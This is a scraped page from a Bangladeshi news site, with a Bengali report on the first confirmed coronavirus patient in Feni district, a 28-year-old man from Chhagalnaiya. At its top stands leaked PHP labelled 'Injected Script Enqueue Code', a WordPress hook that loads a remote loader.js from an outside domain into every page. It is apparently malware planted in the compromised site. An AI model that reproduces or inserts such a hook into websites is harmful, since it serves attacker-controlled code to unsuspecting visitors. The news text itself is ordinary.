// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ফেনীতে প্রথম করোনা রোগী শনাক্ত - Janabarta.com

ফেনীতে প্রথম করোনা রোগী শনাক্ত

জনবার্তা ডেস্কঃ ফেনীতে প্রথম করোনাভাইরাসে আক্রান্ত রোগী শনাক্ত হয়েছে। ২৮ বছর বয়সী যুবক ছাগলনাইয়া উপজেলার উপজেলার রাধানগর ইউনিয়নের পশ্চিম মধুগ্রামের বাসিন্দা। তিনি ঢাকার মিরপুরে একটি মোবাইল কোম্পানীতে চাকুরী করেন।

জেলা সিভিল সার্জন ডা. সাজ্জাদ হোসেন জানান, গত ২৫ মার্চ ওই যুবক ঢাকা থেকে ফেনীর ছাগলনাইয়া তার নিজ গ্রামে আসেন। তার জ্বর-শ্বাসকষ্ট দেখা দিলে ১৪ এপ্রিল নমুনা সংগ্রহ করে পরীক্ষার জন্য চট্টগ্রামের বিআইটিআইডি তে পাঠানো হয়। বৃহস্পতিবার রাতে ওই নমুনা পরীক্ষার ফল ‘পজেটিভ’ রিপোর্ট আছে।

সিভিল সার্জন আরো জানান, ওই যুবক ফেনীতে প্রথম করোনাভাইরাস আক্রান্ত ব্যক্তি। তিনি বলেন, রোগীর অবস্থা দেখে চিকিৎসকদের পরামর্শ অনুযায়ী প্রয়োজনীয় ব্যবস্থা নেওয়া হবে। একই সাথে তার পরিবারের অন্যান্য সদস্যের নমুনা সংগ্রহ করে পরীক্ষা করা হবে।

জেলা প্রশাসক মো. ওয়াহিদুজ্জামান বলেন, ওই রোগিকে স্বাস্থ্য বিভাগ আইসোলেশনে এনে চিকিৎসা দেবে। পরিস্থিতি বিবেচনায় গ্রামটি লকডাউন করা হতে পারে।